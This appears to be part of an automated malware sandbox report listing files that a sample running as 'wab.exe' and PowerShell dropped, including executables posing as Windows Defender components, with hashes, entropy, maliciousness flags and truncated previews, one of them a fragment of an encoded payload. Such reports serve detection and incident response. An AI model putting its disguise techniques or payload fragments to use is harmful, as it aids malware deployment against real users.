                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):224632
                                                                                                Entropy (8bit):5.346658740278611
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk3FtCsHjgU7HOg6KTe/+EypudsD22QnSUEhydebz41:Stx0SA+EySaQKeUz41
                                                                                                MD5:5936E6A9592A373B502A4F40CEB5D274
                                                                                                SHA1:BD0C0A126F79B77E6461668546FFB4B5702BFAB1
                                                                                                SHA-256:CFBB8E8FB6B042DB6E2293FDE43FA24B9AE2670AD0445A56DE3214E4901088F7
                                                                                                SHA-512:DABABC717ACD000A418A2D118EE497C65C62B1FAF4318BAF1DB53CA0D06F88F563CDAFFDF9DEB73680179EB0CED2E45F3A22B865F6B655B299CFC0450820CE08
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):431336
                                                                                                Entropy (8bit):5.752299246327897
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:lzBRUKCBTwZVr2miTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOV3:lzBRnCBOrsBOBf
                                                                                                MD5:D5945FAB44111E3D0DB2861C8AC32EDC
                                                                                                SHA1:FB811D4D198C79FB29A359045415EDDA3C49E877
                                                                                                SHA-256:A059F0CC641E7736354E4A12A830D51A930E5118AA1B95E70F1EE1486733B931
                                                                                                SHA-512:4C05B14F24C1720AB7A11A982C4955D6AB395CA272927810EB4AC53AD97C577E23902340947014EB99D9E39F1FBBB09C83A185158190800A097B33711A22606B
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):175160
                                                                                                Entropy (8bit):5.636057353438849
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkS/VpSIcnsHKTe8LnZCA5OfkQAm95kQOJeqx6u:NtkIpdA5OfzDUeqx6u
                                                                                                MD5:F59DCF1E724D7EA7DFB018B3C71C8D2E
                                                                                                SHA1:EB71834CA1B44C7C11FCA8A77BD8522FA967A8CD
                                                                                                SHA-256:EA930FA7ABE8831AC22AEF0BF777A332DFCB013A44780E313C6659AEC0D52A73
                                                                                                SHA-512:6C1D461DDFA42DD74847008B02D1EECA1B311BCE14FF1D139E22A0120CBFF7FF0AA0695BCA6B111236794B0616E9B0A42BEF6A3C6B6DEE2C7F4018B162A06F44
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):3162480
                                                                                                Entropy (8bit):6.453693784011875
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:dnW4jqFRZega3xejvY7GQOx4K1fm15FKqO7t78Ity6fod76lmlW8U:gs3OBj4UmOH
                                                                                                MD5:35EF8966CF2F29F477E46516D8A993FA
                                                                                                SHA1:979AD1DB259F4964EC546671FF151062CF61C6F0
                                                                                                SHA-256:2BDF1627356719CE8433F93B92B3397D1828CC4BE2D23E991AEEB7758C2FA825
                                                                                                SHA-512:CAF7B8F2240F1D1995744F1FCD893E565D747B80D46D1E48BB0B321ACE166D338EF566CAD1BA441DF8FDE91FC8EF6BA7AB7F198755717EA6DB67CAE862A4730F
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1309408
                                                                                                Entropy (8bit):6.458547418142826
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:n+sGOL9NLM3r4Viwj6KLqGua43loEeUFmwv:n4AA4eGua43lgUFrv
                                                                                                MD5:FC820BCEC712B78BA14EA3640EE769B2
                                                                                                SHA1:FB2466FBD7CDA915B673D193C47273207C3AEF4A
                                                                                                SHA-256:7231DBFC40D9873E4BC1DC1BB1009DA4B4B2AC88DECD32C1DDE9972879AF3E80
                                                                                                SHA-512:A4D82FAA7F427E76A149CB4A1B71CF8FFE8AB7A2D320036619885DDD3F0FDF28F16D46B34644D89439BC9A3A018D9DBE08970A098A9FC5CF86802427745B5CCA
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):922944
                                                                                                Entropy (8bit):6.405617419551067
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:r9/Bro8OEYbhEdbsrg4Sxz2/Sl92ncG15fQ224i5pQ+poPCcqyt4:x/BrnYuqFcL3pQ+pDX
                                                                                                MD5:C8FAC366154F4FF47A7FBB3FE4BD2B2F
                                                                                                SHA1:030C41FCF646FABD9020B957EDB47EE51D723028
                                                                                                SHA-256:D0715B811F5141AC52B2ADFD8BE547420A69D37705708EAD803B799D0B3EECEF
                                                                                                SHA-512:454C9BACDD6AC22ED99646A851989F2003A983BF70BC36F0BC451271C77F4CF8F63291426F0ACEC9DE63E56274BDFE893FE45F62465D1A39C076355D8DCCB580
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):692064
                                                                                                Entropy (8bit):7.130899608128055
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:qskY7gjcjhVIEhqgM7bWvcsi6aVUfIy+U40vy3W/ceKSHMsiFyY6XNmnMwJ:qsZgjS1hqgSC/izkfFjymk4HM5yJwMK
                                                                                                MD5:77555D5F69BB2A59A77A0AE6C4E90E2A
                                                                                                SHA1:312A7728F788511414A3AE803DC7EB85C8807FB9
                                                                                                SHA-256:B93B5BF45B3FB87F4BCBE2F97B41071C0C68712B3BFA2455C711DF2C9E85B7D4
                                                                                                SHA-512:43D39F39C2E6F50866B4B3D9592EB0C3FDE254822A7B9206C11C7C2054BE9023A5116395F0E181A21A5F149A7C9338B4C81DC85B5304841632AC9C5C9D3BFFD4
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:modified
                                                                                                Size (bytes):11608
                                                                                                Entropy (8bit):4.8908305915084105
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                                                                MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                                                                SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                                                                SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                                                                SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                                                                Malicious:false
                                                                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):1.1628158735648508
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:NlllulLhwlz:NllUO
                                                                                                MD5:F442CD24937ABD508058EA44FD91378E
                                                                                                SHA1:FDE63CECA441AA1C5C9C401498F9032A23B38085
                                                                                                SHA-256:E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6
                                                                                                SHA-512:927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631
                                                                                                Malicious:false
                                                                                                Preview:@...e................................................@..........

                                                                                                C:\Users\user\AppData\Local\Temp\3582-490\wab.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):475136
                                                                                                Entropy (8bit):6.119576160135665
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:S8Tx5KRZ18xtSP+szdcIugOO50MMEMOk7:SdmxtSP+sJ+O5FWP7
                                                                                                MD5:72AD21D191B58842334D32A381EA7FA8
                                                                                                SHA1:F7375F09855A7BCE9F7A152C75E84AAC69CAF828
                                                                                                SHA-256:87ABFAB7BF5E213FC9E63C7FA39EDFA6452EB5F7FDD668CD370D9CF4EA3EF729
                                                                                                SHA-512:78662231C7CE0D03374B69DFD32614786DC5BF0C8AD2BAADF2143F42BB03BD378632CC457DC414AA7E3D284674CC9151C39F90D71D9A5DD15DBA689B2283386D
                                                                                                Malicious:false
                                                                                                Preview:.g..N..#cr.Y...N[....E)..qR..B....?..:.\...q|.E'=....T5..X.<:r.go.f./...T.....0~a.#Xt8vG#B~.i..d.@n<...M.._.^...M%.s...D.....f..#....0......&.Am5....u.H3.w.2m....[..SsP\...!K..W...DYF!.O......8L....6.d.=SG.=.........3..Ux....Xr.Tj@.f...n....QFT .g.2C^...{...P.f...ba..M"..iU.....d..p...Z..9._...7.<......hC>.....aM....BZ..08..;."..=........<_!.}.....+.........F\......Q.tX..I]L....>.1..Q..<......f`.g.M.N.........!..!_...Q./.."yZ."[.yw.[...Mq-..G......?......./..#.{k...9>....LI?.A.I/......1...&.p..Vp..l..q..oO.st.R...f..._......?..d...........BR.......2&.....q1.z...x.\.V...J.M..0....,.y...GH./4o..;M...z.....qq..U.....n.....Pw.G.)9..........b...w.l...aJAV..o..../..Yg..l.h..PT>...i].i.JGkA/....X^..j..R.5.)...tA.k3..e.s|.,....),./......%..G(.(P.E.....B....6....)J#!....*1.>..#.h..d......vE9.......[[.0.....w......lJ....nE.h....E].6..,..B.%..#.B.:...X.g+^{O.r...u.......c.D.;.6=.?.u.6S....f.I..j...l.s.....%N.H.{..dW..).L.....d...!.....&......oR

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1tbuq1lj.x5v.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ap1hgj5t.3v1.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dykonr4d.1i4.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zo2adzmy.zx5.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\chrome.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):182272
                                                                                                Entropy (8bit):6.486621682985029
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkd4WLuzeHpl18fCtnRPF9EVnb43jaI5gr/uHqZLWfp2KkvL5kdnQB:oBmCtnRPF9cCGr/uH0gkSdQB
                                                                                                MD5:04712BCBEE377C2B2054D801CC3C4CD2
                                                                                                SHA1:93076F652326A517F4D325DD85FAD044A7BEF755
                                                                                                SHA-256:B217D6FA0ACE851216ADF5F3CB58A8A03ABFFC15EB1DC6C1F5B11FC99F069BA4
                                                                                                SHA-512:334CB034F585CC9A53D6D69136253A3720BB64F3D4C398F40E56AF18DB692DA7800DE0D4B8BDCAFE9B031A3C280432BAF6CEBA1FA1FE5B345887E4E3337038DD
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\tmp5023.tmp

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):8
                                                                                                Entropy (8bit):3.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:+mY:+mY
                                                                                                MD5:9208C89CC3882B1D7CA4FCF69D76B570
                                                                                                SHA1:49FD5F1DDED5D920DF6E0B0AEDE4CF88533992A0
                                                                                                SHA-256:C460697A80A64FD7934FD73E88B11AA8E66BE9E407E2622A3CE3704C971E136D
                                                                                                SHA-512:7A674F8B1E05D46E850485CFCBAA11E57F49CD0F3FFEBB18806479513607A6080891DF495CB9BACAC029D96CAAA4966FCED9212D23916A3225D55BE33B402B63
                                                                                                Malicious:false
                                                                                                Preview:.C..&A

                                                                                                C:\Users\user\AppData\Roaming\Fettle.Han

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):441484
                                                                                                Entropy (8bit):5.949681051539349
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:SYx48eSdC5bGAsSdagHSJfc5TJMADVRaEINdSuzkFCzLlfrgyr28zA7P7eBBfs4:ZGodC5bSsagqfKrYfk+lvZBy4
                                                                                                MD5:55CA93FBEAA671E53D34C80FE6912D87
                                                                                                SHA1:9F722FBAF5C5353347AFBDE9D3840CBF38F45FB9
                                                                                                SHA-256:6DDEB5617A35CB4F0975B03118587F8D77F0F06DCDF13BC8532CAA37BBA195AD
                                                                                                SHA-512:79352E41E4691142721EFADC4BAC30804A2B89C3464A474017950063FDE46FF9F779E1506DF459E10FD87829B1CBD02E5199B863A059AEF55E7914E358E05C8D
                                                                                                Malicious:false
                                                                                                Preview:6wJjO3EBm7sAzBMAcQGb6wIJGANcJATrAiRW6wIUfbnaHE89cQGbcQGbgfFarOCMcQGb6wKVC4HxgLCvsesC87brApet6wLak3EBm7r6UX6S6wLg8+sCIhjrAhkW6wIv8zHKcQGb6wIjvYkUC+sCty1xAZvR4nEBm+sCXwGDwQRxAZvrAiGygfnAJh4CfMpxAZtxAZuLRCQEcQGbcQGbicPrAoSOcQGbgcM/hbUBcQGb6wIy+rr/9xrOcQGbcQGbgfJPFh3RcQGbcQGbgcJQHvjgcQGbcQGbcQGbcQGbcQGbcQGbiwwQ6wIn3esCUhaJDBNxAZtxAZtC6wIDqHEBm4H6LJwEAHXWcQGbcQGbiVwkDHEBm3EBm4HtAAMAAOsCVsRxAZuLVCQI6wJAKXEBm4t8JARxAZvrAn3bietxAZvrAoxcgcOcAAAAcQGbcQGbU3EBm3EBm2pAcQGbcQGbietxAZvrAhDyx4MAAQAAAAA1AusCNifrAkxYgcMAAQAA6wI3q+sCw8lT6wKO2HEBm4nrcQGbcQGbibsEAQAA6wIBvusC8OGBwwQBAADrAqMacQGbU3EBm3EBm2r/6wI56nEBm4PCBXEBm3EBmzH26wImCOsCU8wxyXEBm+sCm5aLGusCOX3rArseQXEBm+sC7Pg5HAp183EBm+sC7L9GcQGbcQGbgHwK+7h13usCLXbrAqpCi0QK/HEBm3EBmynw6wLHhnEBm//ScQGbcQGbuiycBABxAZvrAlSsMcBxAZtxAZuLfCQMcQGb6wJAE4E0B/NiNsVxAZtxAZuDwARxAZtxAZs50HXmcQGb6wJG0In76wIp3HEBm//X6wJDxOsChkd3ucECLHPpwcu4vyA05ys6DJ2HQoAFt3Dunck6qGUOQ3LXKzoMnRx1Zde3QO6dyTqzsBRuv5272AydybAElfQU/4dSkHqHj7ZrGUJsWd/04HKT/AUr9rcsdm1t6HKj0nNELrc+rbB9tZVb5QK3

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7346591629728882
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:/lcEVwMLPr3C4U28gjo3ukvhkvklCywGmdjB5vlR/PSogZolDB5vl4/PSogZoh1:NSM33CxHgPkvhkvCCtNB5veHCB5vpHC
                                                                                                MD5:1FACD43FF248EA754B7A0FA447B3394E
                                                                                                SHA1:C6DFDEC4CA178B9BE53DC4F580786B6B7F32F9D2
                                                                                                SHA-256:A667DBB95AF4465BF788D9BA61CB3D44FB07F24A74871414B8A3AF1FBC7EA079
                                                                                                SHA-512:1231155F951C7A798C94800246474ED0BC21978DE72E021BE1391EDBC3B43B6B8B8CDB47AEE1F500C0A35F70C0A9D744609B7F621FFF8F0FB8436145B18BC3F8
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...-/.v.....^..D...z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....hj:.D.......D.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.............................%..A.p.p.D.a.t.a...B.V.1......X....Roaming.@......CW.^.X............................Or..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`.............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.X......Q...........

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QXNOSMJZBFIFULAULB39.temp

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7346591629728882
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:/lcEVwMLPr3C4U28gjo3ukvhkvklCywGmdjB5vlR/PSogZolDB5vl4/PSogZoh1:NSM33CxHgPkvhkvCCtNB5veHCB5vpHC
                                                                                                MD5:1FACD43FF248EA754B7A0FA447B3394E
                                                                                                SHA1:C6DFDEC4CA178B9BE53DC4F580786B6B7F32F9D2
                                                                                                SHA-256:A667DBB95AF4465BF788D9BA61CB3D44FB07F24A74871414B8A3AF1FBC7EA079
                                                                                                SHA-512:1231155F951C7A798C94800246474ED0BC21978DE72E021BE1391EDBC3B43B6B8B8CDB47AEE1F500C0A35F70C0A9D744609B7F621FFF8F0FB8436145B18BC3F8
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...-/.v.....^..D...z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....hj:.D.......D.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.............................%..A.p.p.D.a.t.a...B.V.1......X....Roaming.@......CW.^.X............................Or..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`.............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.X......Q...........

                                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                Category:dropped
                                                                                                Size (bytes):1835008
                                                                                                Entropy (8bit):4.462932527061137
                                                                                                Encrypted:false
